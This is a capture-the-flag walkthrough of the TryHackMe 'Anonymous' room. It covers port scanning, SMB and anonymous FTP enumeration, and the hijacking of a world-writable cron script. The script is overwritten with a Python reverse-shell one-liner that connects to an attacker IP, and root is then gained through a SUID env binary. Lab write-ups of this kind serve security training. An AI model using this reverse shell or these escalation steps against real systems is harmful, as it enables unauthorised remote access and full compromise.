Task 1: VPN & Host Configuration

Before starting, we connect to the TryHackMe VPN and confirm connectivity to the target machine with a ping test.

Connecting to TryHackMe via OpenVPN

Before start any TryHackMe machine, we need to establish a secure connection to their network using OpenVPN.

medium.com

Before connecting to the target, it is a good practice to map the IP address to a custom hostname using the /etc/hosts file. This makes the workflow cleaner and avoids repeatedly typing the IP address.

A detailed guide on configuring this can be found here

Try_hack_me_Room_solves/Extra/host-configuration at main · Punih3r7/Try_hack_me_Room_solves

Contribute to Punih3r7/Try_hack_me_Room_solves development by creating an account on GitHub.

github.com

Task 2: Scanning with RustScan

We run a full port scan using RustScan with aggressive service detection:

rustscan -a <target-ip> -- -A

Scan results reveal:

Enumerate the machine. How many ports are open?

3 ports open

None

What service is running on port 21?

FTP

None

What service is running on ports 139 and 445?

SMB (Samba)

None

Task 3: SMB Enumeration

We list available SMB shares on the target using smbclient:

smbclient -L <target-ip>

We find a share named pics on the user's computer.

None

Task 4: Anonymous FTP Login

The RustScan results also reveal that anonymous FTP login is available. We connect to the FTP service without any credentials:

None
ftp <target-ip>
Username: Anonymous
Password: (just press Enter)
None

After logging in, we list the contents and find a /scripts folder. We download all the files inside to our local machine using the get command to examine them:

None
ls
cd scripts
get clean.sh
get to_do.txt
get removed_files.log

Task 5: Analyzing clean.sh — Cron Job Discovery

Here the clean.sh looks like related to clean.sh

None

clean.sh says it's a cleanup script being executed as a cron job.

None

Crucially, the file is world-writable,we can modify its contents without any special permissions.

This gives us a perfect opportunity to inject a reverse shell payload.

Task 6: Injecting a Reverse Shell into clean.sh

We edit clean.sh on our local machine and replace its contents with a Python reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

here's some link where the reverse shell link can be found

Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…

pentestmonkey.net

Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw…

revshells.com

We upload the modified file back to the FTP server, overwriting the original:

put clean.sh

We set up a Netcat listener on our attacking machine:

nc -lvnp 1234

When the cron job runs, it executes our modified script and we catch a reverse shell.

None

User Flag

cat /home/namelessone/user.txt

Task 7: Privilege Escalation via SUID env

With a shell on the target, we search for SUID binaries that could be abused for privilege escalation:

find / -perm -4000 -type f 2>/dev/null

We find /usr/bin/env has the SUID bit set.

To understand why this is exploitable i have quick writing on that

SUID env" Privilege Escalation (Quick Guide)

What SUID means

medium.com

i used gftobins for the shell comand payload

None
/usr/bin/env /bin/sh -p
None

Root Flag

cat /root/root.txt
None

Final Thoughts

Anonymous is a clean and beginner-friendly room that covers a realistic attack chain:

  • Full port scanning with RustScan
  • SMB share enumeration
  • Anonymous FTP login and file enumeration
  • Cron job hijacking via a world-writable script
  • SUID binary abuse for privilege escalation